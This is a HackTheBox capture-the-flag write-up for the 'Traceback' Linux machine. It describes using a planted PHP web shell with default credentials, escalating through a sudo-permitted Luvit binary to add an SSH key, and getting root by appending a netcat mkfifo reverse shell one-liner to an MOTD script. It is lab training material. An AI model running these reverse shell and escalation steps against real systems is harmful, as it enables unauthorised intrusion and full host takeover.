HackTheBox Writeup — Traceback
Hack the Box is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine ‘Traceback’, which runs a Linux OS and is one of the ‘Easy’ rated machines.
The initial foothold on this box involves finding a hidden web-shell on an already compromised web-server and utilising this to upload our own PHP reverse shell to gain access as the ‘Webmin’ user. To escalate our privileges we exploit the fact that Webmin has Sysadmin privileges on a Luvit binary. Finally, to escalate to Root we modify one of the ‘Message of the Day’ files and exploit the fact that it always executes with Root privileges when anyone logs in via SSH.
2. Enumeration and Initial Foothold (Webmin)
The results show just two services running, SSH on port 22 and a web application running on port 80. I visited the web application and was presented with the page below.
After inspecting the web page it was clear there was no functionality to interact with, however the HTML source code contains the following comment:
<!--Some of the best web shells that you might need ;) -->
This comment led me to do some OSINT gathering and led me to a popular Github repository that contained numerous PHP web-shells. The comment at the top of the repository matched the HTML source code comment exactly so I assumed I was on the right track. After appending http://10.10.10.181/smevk.php to the URL I was presented with the page below.
I instantly tried admin:admin for the credentials as detailed in the Github repository and this was successful. I now had access to a web console that allowed me to upload PHP files, so I downloaded and modified a PHP reverse shell script from PenTestMonkey and uploaded this to the web console, which is named ‘JDR.php’.
Back on my Kali machine I opened up a netcat listener on port 9090 and issued the following curl command in another terminal window to make a HTTP GET request for the JDR.php file.
This allowed me to pop a reverse shell on the Traceback machine and gain an initial foothold as the ‘Webmin’ user.
3. User Shell — Sysadmin
After upgrading my shell, I ran a Linux enumeration script which returned three promising results.
- A strange ‘note.txt’ file within the Webmin home directory.
- Webmin has special permissions on a Luvit binary within the Sysadmin home directory.
- The Sysadmin home directory also contains a hidden SSH directory.
In short, the Luvit binary allows the execution of Lua scripts and since we have permission to run this with Sysadmin privileges, we can create a Lua script to insert our public RSA key into the Sysadmin’s hidden SSH directory.
I then used a Python SimpleHTTPServer to host the Lua script temporarily and downloaded this to the Traceback machine using wget.
Now that the malicious Lua script is in the Webmin’s home directory, I used the command below to run the script with Sysadmin privileges.
sudo -u sysadmin /home/sysadmin/luvit
Returning back to my Kali machine I logged in as Sysadmin via SSH.
Continuing the privilege escalation, I inspected the processes running on the Traceback machine using pspy64. I noticed that there was a process running as root that copies the ‘Message of the Day’ (motd) files from the backups directory into the /etc/update-motd.d/ directory every 30 seconds.
Navigating into this directory we can see that the Sysadmin user has write permissions on these files, and after inspecting the contents of the 00-header file I noticed that this is the same content that is displayed to the terminal when logging in with SSH (see image 12).
This means that if we can modify this file to execute a reverse shell command back to our machine, when we login as Sysadmin via SSH this command will execute with root privileges and we will have a shell as root, however this needs to be done quickly before the running process overwrites our changes. The reverse shell command that worked for me is the one below, which needs to be appended to the end of the ‘00-header’ file.
rm /tmp/f1; mkfifo /tmp/f1; cat /tmp/f1 | /bin/sh -i 2>&1 | nc 10.10.17.13 8888 > /tmp/f1
Opening up a netcat listener on port 8888 on our Kali machine, quickly logging as sysadmin via SSH drops us into a root shell where we can retrieve the root flag.
This was my fifth owned machine on HackTheBox and definitely one of my favourites, although I wasn’t too keen on the initial stage as it felt like guess work rather than working something out. Nevertheless I learnt something new every step of the way, including learning a little bit about Lua and the importance of checking running processes.
Keep an eye out for my future write-ups!